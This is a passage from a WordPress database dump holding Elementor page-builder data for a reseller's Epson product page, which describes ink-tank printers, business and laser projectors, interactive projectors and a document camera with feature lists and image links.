6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L805 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/h4><p><br \\/>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11bfc36\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":\"12\",\"bottom\":\"12\",\"left\":\"12\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4af8eba\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2055<\\/strong><\\/h4><p><img class=\\\"wp-image-2434 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"646b12f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"12\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"19\",\"bottom\":\"19\",\"left\":\"19\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-2142W<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/h4>\\nEnjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.\\n<ul>\\n \\t<li>White and Colour Brightness at 4,200lm<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>12000 hours lamp life in eco-mode<\\/li>\\n \\t<li>MHL-enabled<\\/li>\\n \\t<li>Multi-PC Projection<\\/li>\\n \\t<li>Horizontal Keystone Slider<\\/li>\\n \\t<li>Miracast<sup>\\u00ae<\\/sup><\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><\\/center>\\n<\\/span><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-L500W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/>\\n\\nThe compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.\\n<ul>\\n \\t<li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li>\\n \\t<li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li>\\n \\t<li>Laser light source of up to 20,000 hours<\\/li>\\n \\t<li>Virtually maintenance-free for optical engine life<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"16f2278\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson LightScene EV-105<\\/strong><br \\/><br \\/><\\/h4><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"3a36c38\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7dad77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b7207fe\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"466ac31\",\"elType\":\"widget\",\"settings\":{\"title\":\"ULTRA PORTABLE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-1785W\\u00a0<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2438 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"238\\\" height=\\\"177\\\" \\/>\\n\\nThe Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.\\n<ul>\\n \\t<li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>Real-Time Auto Keystone Correction<\\/li>\\n \\t<li>Split Screen Projection<\\/li>\\n \\t<li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4f4cdf2\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2439 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1dcee02\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/h4>\\nWith the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.\\n<ul>\\n \\t<li>WXGA Resolution<\\/li>\\n \\t<li>White and Colour Brightness at 3,300lm<\\/li>\\n \\t<li>Multi-PC projection<\\/li>\\n \\t<li>HDMI Connectivity x2<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(8054,3494,'_elementor_version','2.5.14'),(8057,3495,'_wp_page_template','template-fullwidth.php'),(8058,3495,'_elementor_edit_mode','builder'),(8059,3495,'_elementor_template_type','post'),(8060,3495,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK 